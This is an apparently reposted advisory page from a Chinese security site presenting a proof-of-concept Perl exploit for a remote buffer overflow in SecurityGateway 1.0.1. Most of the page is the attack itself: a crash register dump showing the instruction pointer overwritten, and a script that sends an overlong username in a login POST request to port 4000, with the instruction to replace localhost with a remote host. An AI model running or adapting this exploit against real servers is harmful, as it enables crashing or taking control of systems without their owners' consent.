SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC
|
来源:http://www.altn.com/ 作者:critical 发布时间:2008-06-02
|
|
################################################################################################################## # SecurityGateway 1.0.1 Remote Buffer Overflow ( username) # Vendor: http://www.altn.com/ # risk : critical #SecurityGateway open port 4000 for remote administration/managment, EIP get owned when the username field is filled with 720 chars # #eax=00000000 ebx=00000000 ecx=63636363 edx=7c9137d8 esi=00000000 edi=00000000 #eip=63636363 esp=042ce910 ebp=042ce930 iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 #63636363 ?? ??? # # Replace http://127.0.0.1:4000/ with your remote host.
use LWP::UserAgent; $connect = LWP::UserAgent->new; my $payload1 ="a" x 236; my $payload2 ="b" x 480; my $eip_owned = "c" x 4;
print "SecurityGateway Remote BoF exploit by securfrog.\n\n"; my $req = HTTP::Request->new(POST => 'http://127.0.0.1:4000/SecurityGateway.dll'); $req->content_type('application/x-www-form-urlencoded'); $req->content('RequestedPage=login&username='.$payload2.$eip_owned.$payload1.'&passwd=world&lang=en&logon=Sign+In'); my $res = $connect->request($req); print $res->as_string; print "Exploit successfull\n";
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|